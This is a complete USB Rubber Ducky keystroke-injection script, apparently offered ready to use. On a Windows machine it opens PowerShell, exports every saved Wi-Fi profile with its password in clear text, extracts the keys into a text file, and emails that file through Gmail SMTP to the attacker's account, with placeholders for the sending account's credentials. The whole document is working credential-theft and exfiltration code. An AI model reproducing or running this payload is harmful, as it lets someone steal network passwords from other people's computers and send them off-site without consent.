REM The setting acess through unsafer Apps in the security section of your botaccount settings has to be turned on!
GUI r
DELAY 300
STRING powershell
DELAY 10
ENTER
DELAY 1500
STRING cd $Env:temp
ENTER
STRING Remove-Item -LiteralPath "wifipwgrabber" -Force -Recurse
ENTER
DELAY 10
STRING mkdir wifipwgrabber
ENTER
DELAY 10
STRING cd wifipwgrabber
ENTER
STRING netsh wlan export profile key=clear
ENTER
DELAY 300
STRING powershell Select-String -Path W*.xml -Pattern 'keyMaterial' > Wi-Fi-PASS.txt
DELAY 10
ENTER
DELAY 150
DELAY 2000
REM ------------Email wifipasswords as an Attachment ------------
STRING Function sendmail($FROM,$TO,$SUBJECT,$BODY,[System.IO.FileInfo[]]$ATTACHMENTS = $null){
ENTER
STRING   $SMTPHOST = "smtp.gmail.com"
ENTER
STRING   $SMTPPORT = 587
ENTER
STRING   $SMTPUSER = "<yourbotaccount@gmail.com>"
ENTER
STRING   $SMTPPass = "<thepasswordofyourbotaccount>"
ENTER
STRING   $SMTPClient = New-object System.Net.Mail.SmtpClient($SMTPHOST,$SMTPPORT)
ENTER
STRING   $SMTPClient.EnableSsl = $true
ENTER
STRING   $Mail = new-object System.Net.Mail.MailMessage
ENTER
STRING   $Mail.from = $FROM 
ENTER
STRING   $Mail.to.add($TO)
ENTER
STRING   $SMTPClient.Credentials = new-object System.Net.NetworkCredential($SMTPUSER,$SMTPPass)
ENTER
STRING   $Mail.Subject = $SUBJECT
ENTER
STRING   $Mail.Body = $BODY
ENTER
STRING       foreach ($att in $ATTACHMENTS){
ENTER
STRING         $Mail.Attachments.Add($att.FullName)
ENTER
STRING       }
ENTER
STRING   $SMTPClient.Send($Mail)
ENTER
STRING   $smtpclient.Dispose()
ENTER
STRING   $mail.Dispose()
ENTER
STRING }
ENTER
STRING sendmail "<yourbotaccount@gmail.com>" "<youraccount@gmail.com>" "Wifi Passwords from RubberDucky" "txt file as Appendix" (gci $env:temp\\wifipwgrabber\Wi-Fi-PASS.txt)
ENTER


DELAY 3000
STRING exit
ENTER